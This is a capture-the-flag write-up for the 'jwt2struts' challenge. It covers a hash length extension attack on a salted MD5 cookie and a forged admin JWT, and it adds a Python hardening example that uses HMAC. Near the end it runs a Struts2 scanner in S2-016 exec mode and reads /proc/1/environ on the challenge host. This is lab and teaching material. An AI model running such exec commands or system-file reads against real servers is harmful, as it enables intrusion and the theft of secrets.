jwt2struts
On entry the page says: You are now logged in as user. Try to become admin.
Viewing the page source, a comment points to JWT_key.php:
```php
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
        if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}
```
My first thought was to double or triple URL-encode root in the password field, but then md5($salt.$username.$password) no longer matches. I also considered brute-forcing $salt with a script, but that was too slow.
This is where I learned something new: the principle of the hash length extension attack.
References:
- hash长度扩展攻击 | KANGEL (j-kangel.github.io)
- Hash拓展长度攻击原理剖析 - FreeBuf网络安全行业门户
- This yields the secret_key: sk-he00lctf3r
- Next, forge an admin token on the JWT site
- Sending it reveals the /admiiiiiiiiiiin route
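As an added defensive example (not part of the original writeup), here is the JWT_key.php check reproduced in Python beside a hardened version; the function names, the 14-byte demo salt and the length-prefixed field framing are my own assumptions, not the challenge's code.

```python
import hashlib
import hmac

# Constructed 14-byte salt for the demo; the challenge's real salt is unknown to the client.
SALT = b"A" * 14


def vulnerable_digest(salt: bytes, username: str, password: str) -> str:
    """The challenge's construction: md5(salt . username . password).

    Two defects: the fields are joined with no separator, so ("admin", "root")
    and ("adminr", "oot") hash identically; and a secret-prefix MD5 is a
    length-extendable MAC, so one known digest plus the salt length is enough
    to forge digests for longer inputs without ever learning the salt.
    """
    return hashlib.md5(salt + username.encode() + password.encode()).hexdigest()


def frame_fields(*fields: str) -> bytes:
    """Length-prefix every field so field boundaries cannot be shifted."""
    out = b""
    for field in fields:
        data = field.encode()
        out += len(data).to_bytes(4, "big") + data
    return out


def safe_digest(key: bytes, username: str, password: str) -> str:
    """HMAC is not length-extendable, and the framed input removes the ambiguity."""
    return hmac.new(key, frame_fields(username, password), hashlib.sha256).hexdigest()


def verify_digest(key: bytes, username: str, password: str, presented: str) -> bool:
    """Constant-time comparison, the equivalent of PHP's hash_equals()."""
    return hmac.compare_digest(safe_digest(key, username, password), presented)


if __name__ == "__main__":
    # Field-boundary ambiguity exists in the original construction but not in the hardened one.
    print(vulnerable_digest(SALT, "admin", "root") == vulnerable_digest(SALT, "adminr", "oot"))  # True
    print(safe_digest(SALT, "admin", "root") == safe_digest(SALT, "adminr", "oot"))  # False
```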
Inside is a submission form. Given that the challenge name hints at Struts, I looked for a tool to scan it.
The one I used: https://gitcode.net/mirrors/Vancomycin-g/struts2scan
Then I just ran it straight through:
```shell
python3 Struts2Scan.py -u http://140.210.223.216:55557/admiiiiiiiiiiin/user.action
python3 Struts2Scan.py -u http://140.210.223.216:55557/admiiiiiiiiiiin/user.action -n S2-016 --exec
>cat /proc/1/environ
```
flag:
*ctf{7r0m_jwt_t0_struts2}